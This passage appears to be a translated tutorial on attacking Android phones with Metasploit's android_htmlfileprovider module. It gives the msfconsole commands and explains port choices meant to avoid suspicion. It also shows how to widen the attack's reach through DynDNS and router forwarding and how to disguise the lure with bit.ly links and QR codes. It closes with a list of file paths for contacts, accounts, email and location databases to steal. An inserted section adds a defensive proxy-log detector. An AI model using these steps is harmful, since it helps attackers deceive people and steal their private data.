with the operating system
Android. We will use a tool that some readers already know, Metasploit, with one of
its auxiliary modules; it can be found in the BackTrack OS. This works
when a device is connected to your local network, but we will use DynDNS
to give the attack a wider reach, and we will see how to obscure the address with
QR codes and link-shortening sites. Let's start!
Steal files: android_htmlfileprovider
The first thing is to open msfconsole in a BackTrack terminal:
root@bt:~# /opt/framework3/msf3/msfconsole
Now let's use one of the Metasploit auxiliary modules, which serves exactly our goal:
msf > use gather/android_htmlfileprovider
msf auxiliary(android_htmlfileprovider) >
Now, let's see the options provided by the module:
msf auxiliary(android_htmlfileprovider) > show options
FILES (the Android file we want to steal)
SRVHOST (the local IP that waits for connections)
SRVPORT (the port that waits for connections)
SSL (optional: whether to negotiate SSL for connections)
SSLVersion (if the option above is enabled, the SSL version to use)
URIPATH (the URI that will be used)
For the moment we will not touch the FILES option. We change SRVPORT to 80, because that is the standard HTTP port and a connection to any other port would look more suspicious. We also change URIPATH, which by default is a random sequence, so that the victim is directed to the root of the server. Do the following:
msf auxiliary(android_htmlfileprovider) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(android_htmlfileprovider) > set URIPATH /
URIPATH => /
Now all that remains is to start the module with the run command and wait for a device to connect to our listening IP.
See the picture below:
Using DynDNS to increase the range
As noted, so far this attack only works on local area
networks (LAN), and smartphones do not usually spend much time connected to the
Wi-Fi network we are interested in. It is possible to extend its
reach, and for that we will use DynDNS, a service that
provides dynamic DNS with domains of the type site.dyndns.org.
We have to go to the http://dyn.com/ site and create an
account. After that, we can register the domain we have
chosen. Then we go to the router settings and specify the domain,
username and password, as you can see (on other routers this may be different).
I must say that DynDNS is an excellent
service. After configuring the DynDNS domain, we only need to set up the
forwarding properly on the router. That is, in our case, the victim will connect
to vidasconcurrentes.dyndns.org (on port 80), and the router should forward that to the IP
and port on which our module is listening.
Obscuring the attack with QR codes and bit.ly
We have everything ready for the attack; all that is left is to pass the
URL to the victims and wait for them to connect. The problem is that a URL like
vidasconcurrentes.dyndns.org can look quite suspicious. In this case we use a
URL shortener; we will use bit.ly (you can find several others).
Finally, if we want a more viral attack, we can create a QR
code (http://qrcode.kaywa.com/) from the link that bit.ly gave us,
which is even harder to detect.
The QR code hides the bit.ly link, for example
http://bit.ly/q9wRCW, which redirects to the DynDNS domain we created,
vidasconcurrentes.dyndns.org, where the module will be listening. See the
example QR code.
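From the defender's side, the chain described above (a short link redirecting to a dynamic-DNS host that serves plain HTTP to an Android browser) is visible in web-proxy logs. The following is an added example, not part of the original post; the record layout, the host lists and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumed lists for this example; extend them from your own intelligence feeds.
SHORTENERS = {"bit.ly"}
DYNDNS_SUFFIXES = (".dyndns.org",)

# Constructed proxy records: (client, user_agent, url, redirect_location or None)
SAMPLE_LOG = [
    ("10.0.0.21", "Mozilla/5.0 (Linux; U; Android 2.2; en-us) AppleWebKit/533.1",
     "http://bit.ly/EXAMPLE1", "http://example-host.dyndns.org/"),
    ("10.0.0.21", "Mozilla/5.0 (Linux; U; Android 2.2; en-us) AppleWebKit/533.1",
     "http://example-host.dyndns.org/", None),
    ("10.0.0.35", "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/9.0",
     "http://bit.ly/EXAMPLE2", "https://www.example.com/news"),
    ("10.0.0.40", "Mozilla/5.0 (Linux; U; Android 2.3.4; en-us) AppleWebKit/533.1",
     "http://intranet.example.com/", None),
]


def host_of(url):
    """Lower-cased hostname of a URL, or an empty string if it has none."""
    return (urlsplit(url).hostname or "").lower()


def is_dyndns(host):
    """True when the host sits under one of the listed dynamic-DNS suffixes."""
    return any(host.endswith(suffix) for suffix in DYNDNS_SUFFIXES)


def find_suspicious(records):
    """Flag shortener -> dynamic-DNS redirects, and Android clients that
    fetch plain HTTP directly from a dynamic-DNS host."""
    alerts = []
    for client, user_agent, url, location in records:
        src = host_of(url)
        if src in SHORTENERS and location and is_dyndns(host_of(location)):
            alerts.append((client, "shortener-to-dyndns", url, location))
        elif (is_dyndns(src) and "Android" in user_agent
              and urlsplit(url).scheme == "http"):
            alerts.append((client, "android-http-dyndns", url, None))
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_LOG):
        print(alert)
```

Either rule alone is noisy, since dynamic DNS and shorteners both have legitimate uses; both firing for the same client in a short window is the stronger signal.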
Once the intrusion has succeeded, just use some creativity to explore the
Android directories; a few in particular are listed below:
Contacts database: /data/data/com.android.providers.contacts/databases/contacts.db
Browser database: /data/data/com.android.browser/databases/browser.db
Accounts database: /data/data/com.google.android.googleapps/databases/accounts.db
Geolocation database: /data/data/com.android.browser/gears/geolocation.db
Telephony database directory: /data/data/com.android.providers.telephony/databases/
Search history database: /data/data/com.google.android.apps.maps/databases/search_history.db
E-mail database directory: /data/data/com.google.android.providers.gmail/databases/